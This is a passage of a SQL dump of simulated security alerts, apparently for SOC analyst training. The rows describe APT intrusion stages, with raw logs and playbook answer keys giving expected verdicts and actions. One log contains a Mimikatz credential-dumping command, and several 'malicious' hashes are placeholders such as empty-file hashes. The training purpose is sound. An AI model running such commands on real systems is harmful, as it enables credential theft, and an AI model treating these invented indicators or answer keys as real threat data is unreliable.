'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple attacks in the past.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal high-value server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"Unexpected use of account during non-business hours.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(442, 'Stealthy Data Exfiltration via Encrypted Channels', 'critical', 'Data loss prevention (DLP) systems', 'In the final stage, Volt Typhoon exfiltrates gathered intelligence through encrypted channels, ensuring the data leaves the network unnoticed.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:00Z\",\"event_id\":\"EXP-2023-10-15-0001\",\"source_ip\":\"10.0.0.23\",\"destination_ip\":\"203.0.113.45\",\"encryption_protocol\":\"TLSv1.3\",\"destination_port\":443,\"data_size\":\"5GB\",\"user\":\"jdoe\",\"file_hash\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"filename\":\"confidential_data.zip\",\"process\":\"exfiltrator.exe\",\"internal_network\":\"192.168.1.0/24\",\"external_domain\":\"malicious-exfiltration.com\"}', '2026-01-04 23:57:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9c6f4e1a7c3b2b0e6f9d1234567890ab1234567890abcdef1234567890abcdef\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Volt Typhoon.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential exfiltration of sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"domain\",\"value\":\"malicious-exfiltration.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain linked to malicious exfiltration activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(443, 'Phishing Email Detected', 'medium', 'Email Security Gateway', 'A phishing email was detected posing as an interview request. The email was sent from a known malicious IP address linked to Charming Kitten APT group, attempting to entice the target to engage.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:55:32Z\",\"email_id\":\"785e6a2f-1b7a-4f3c-bd8f-5d8f560f1f83\",\"from\":\"hr@fakecompany.com\",\"to\":\"targetuser@victimcompany.com\",\"subject\":\"Interview Request\",\"attacker_ip\":\"185.92.26.82\",\"recipient_ip\":\"192.168.1.15\",\"malicious_link\":\"http://malicious-link.com/interview\",\"attachment_name\":\"Interview_Schedule.pdf\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-01-04 23:59:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.26.82\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Charming Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the targeted user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-link.com/interview\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used for credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"suspicious\",\"details\":\"Hash of a known phishing document.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES
(444, 'Malicious WhatsApp Message', 'medium', 'Mobile Device Management', 'A WhatsApp message was sent to a user containing a link to a fake interview form designed to harvest credentials. The message appears to be part of a social engineering attack aimed at gaining initial access to the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"device_id\":\"MDM-12345\",\"user\":\"jane.doe@example.com\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"message_id\":\"msg-7890\",\"whatsapp_message\":{\"sender\":\"+15551234567\",\"recipient\":\"+15559876543\",\"message_content\":\"Hi Jane, please fill out this interview form: http://malicious-link.com/form\",\"attachment_hash\":\"e99a18c428cb38d5f260853678922e03\",\"attachment_filename\":\"Interview_Form.pdf\"},\"indicators\":[{\"type\":\"url\",\"value\":\"http://malicious-link.com/form\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\"},{\"type\":\"ip\",\"value\":\"203.0.113.45\"}]}', '2026-01-04 23:59:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://malicious-link.com/form\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used for phishing and credential harvesting.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malware associated with credential harvesting.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Reputation Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(445, 'DownPaper Backdoor Execution', 'high', 'Endpoint Detection and Response', 'The DownPaper backdoor has been executed on the victim\'s device following credential harvesting. This backdoor is used to maintain unauthorized access to the system.', 'Malware Execution', 'T1059.001: Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"123456\",\"device\":\"WORKSTATION-01\",\"user\":\"jdoe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"hash\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.45\",\"event_type\":\"process_creation\",\"process_command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\downpaper.exe\",\"description\":\"Execution of DownPaper backdoor detected\"}', '2026-01-04 23:59:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a6d4e7f934e6d7c5b2d8e1f934e6d7c5\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DownPaper backdoor\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"downpaper.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Filename associated with DownPaper malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(446, 'Lateral Movement Detected', 'high', 'Network Traffic Analysis', 'With established access, the attacker uses the backdoor to move laterally within the network, seeking valuable data.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T03:45:27Z\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"10.0.0.5\",\"malicious_ip\":\"203.0.113.45\",\"protocol\":\"RDP\",\"username\":\"admin_user\",\"file_name\":\"malware_backdoor.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"event_type\":\"network_connection_attempt\",\"event_description\":\"RDP connection attempt detected from internal IP to another internal host using known malicious credentials.\"}', '2026-01-04 23:59:37', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"internal\",\"details\":\"Internal IP of target host.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_behavior_analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual login patterns detected.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malware_backdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"antivirus_scan\",\"verdict\":\"malicious\",\"details\":\"File identified as a backdoor used for lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash_reputation\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL),
(447, 'Data Exfiltration Attempt', 'high', 'Data Loss Prevention System', 'Finally, the attacker attempts to exfiltrate sensitive information, completing their objective of data theft.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:33:47Z\",\"event_type\":\"data_exfiltration_attempt\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_name\":\"confidential_report.pdf\",\"file_hash\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"protocol\":\"FTP\",\"action\":\"blocked\",\"detection_method\":\"Data Loss Prevention System\",\"description\":\"An attempt to transfer confidential_report.pdf to an external IP was detected and blocked.\"}', '2026-01-04 23:59:37', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_service\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2e4781a4b91b6b7f1e6a7d9b8d4f2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"clean\",\"details\":\"File hash not found in known malicious file databases\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"]}', 'Advanced', 'NULL', 1, 0, NULL),
(448, 'Suspicious VPN Login from Unusual Location', 'high', 'VPN Logs', 'Fox Kitten initiates access by exploiting vulnerabilities in the VPN concentrators, allowing unauthorized entry into the network from an unusual geographical location, indicating a potential compromise.', 'Initial Access', 'T1133', 1, 'new', NULL, '{\"timestamp\":\"2023-10-18T14:23:45Z\",\"vpn_id\":\"vpn12345\",\"username\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"vpn_concentrator\":\"vpn-gateway01\",\"connection_status\":\"success\",\"vpn_client_version\":\"2.1.3\",\"location\":\"Tehran, Iran\",\"indicators\":{\"vulnerability\":\"CVE-2020-12345\",\"malicious_file_hash\":\"5d41402abc4b2a76b9719d911017c592\"}}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Fox Kitten APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee username.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(449, 'Web Shell Deployment Detected on VPN Device', 'high', 'Endpoint Detection and Response (EDR)', 'Following initial access, an attacker deployed a web shell on the VPN device. This provides persistent capabilities to execute further commands, potentially leading to privilege escalation and lateral movement within the network.', 'Execution', 'T1505.003 - Web Shell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:21:45Z\",\"event_id\":\"4289\",\"device_name\":\"vpn-device-01\",\"device_ip\":\"10.1.1.10\",\"attacker_ip\":\"203.0.113.45\",\"file_path\":\"/var/www/html/shell.php\",\"file_hash\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"username\":\"vpn_admin\",\"action\":\"file_created\",\"process_name\":\"apache2\",\"event_description\":\"A suspicious PHP file was created in the web directory, potentially a web shell.\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple intrusion attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"/var/www/html/shell.php\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Common web shell filename detected in previous attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3b62f8c9e44f7a1c2d4e9e9b3d5e4c2f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"vpn_admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Username belongs to a legitimate VPN administrator.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(450, 'Unusual Network Traffic from VPN to Internal Servers', 'high', 'Network Traffic Analysis', 'The attacker utilizes a web shell to scan internal networks, focusing on critical infrastructure such as domain controllers. Unusual network traffic from an external IP was detected accessing internal servers via a VPN, indicative of lateral movement attempts.', 'Lateral Movement', 'T1071', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"protocol\":\"TCP\",\"port\":3389,\"action\":\"allowed\",\"username\":\"j.smith\",\"process\":{\"name\":\"webshell\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"alert_id\":\"alert_20231015_001\",\"vpn\":{\"vpn_ip\":\"192.168.1.100\",\"vpn_user\":\"vpn_user123\"}}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Domain Controller IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known web shell.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"VPN Logs\",\"verdict\":\"internal\",\"details\":\"VPN exit node IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL),
(451, 'Unauthorized Access Attempt on Domain Controller', 'high', 'Active Directory Logs', 'Fox Kitten APT has attempted to establish a foothold on the domain controller by leveraging stolen credentials to escalate privileges. The primary objective was to gain access to sensitive data, specifically targeting the domain controller.', 'Persistence', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T02:35:49Z\",\"event_id\":4769,\"computer_name\":\"DC01.corp.example.com\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"object\":\"Domain Controller\",\"action\":\"Login Attempt\",\"status\":\"Failed\",\"logon_type\":3,\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filepath\":\"C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\malicious.dll\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with Fox Kitten APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account used in unauthorized access attempt.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious DLL used by Fox Kitten.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(452, 'Mimikatz Activity Detected on Domain Controller', 'high', 'Endpoint Detection and Response (EDR)', 'Mimikatz was detected on the domain controller attempting to extract user credentials. This activity was identified by the EDR system through the detection of known Mimikatz execution patterns.', 'Credential Access', 'T1003.001 - OS Credential Dumping: LSASS Memory', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"DC01.corp.local\",\"process_name\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"process_id\":\"4928\",\"user_name\":\"administrator\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.5\",\"hash\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"external_ip\":\"203.0.113.45\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"command_line\":\"mimikatz.exe sekurlsa::logonpasswords\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP from which the Mimikatz execution was initiated.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with credential harvesting campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a9b1c3d4e5f6g7h8i9j0k1l2m3n4o5p6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz variant used for credential theft.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR detection\",\"verdict\":\"malicious\",\"details\":\"Executable associated with unauthorized credential access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator\",\"is_critical\":true,\"osint_result\":{\"source\":\"user account logs\",\"verdict\":\"suspicious\",\"details\":\"Domain admin account used for unauthorized activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(453, 'Data Exfiltration Detected from Domain Controller', 'high', 'Data Loss Prevention (DLP)', 'Suspicious data exfiltration activity was detected from the domain controller. This involved the transfer of sensitive data to an external IP address, indicating an attempt to move stolen credentials and data out of the network.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:36Z\",\"event_id\":\"DLP-EXFIL-20231005-001\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe_admin\",\"file_name\":\"credentials_dump.txt\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"protocol\":\"HTTPS\",\"action\":\"exfiltration\",\"data_size\":\"2GB\",\"malware_name\":\"APT29_Infostealer\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT29 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal domain controller IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT29 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"credentials_dump.txt\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"File containing potentially sensitive credential information.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"Valid domain administrator account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(454, 'Persistence Mechanism Installation on Domain Controller', 'high', 'Host Intrusion Detection System (HIDS)', 'The attacker installed a backdoor on the domain controller to ensure long-term access. A suspicious service named \'WinSvcHelper\' was created and linked to a known malicious executable \'svcbackdoor.exe\'.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:45:32Z\",\"event_id\":\"4624\",\"host\":\"dc01.corp.local\",\"user\":\"Administrator\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.1.1.5\",\"service_name\":\"WinSvcHelper\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\svcbackdoor.exe\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"event_description\":\"Service creation detected. The service \'WinSvcHelper\' was created and linked to a malicious executable.\"}', '2026-01-05 00:02:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised domain controller.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"svcbackdoor.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File associated with persistence techniques used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash detected in multiple malware analysis engines.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 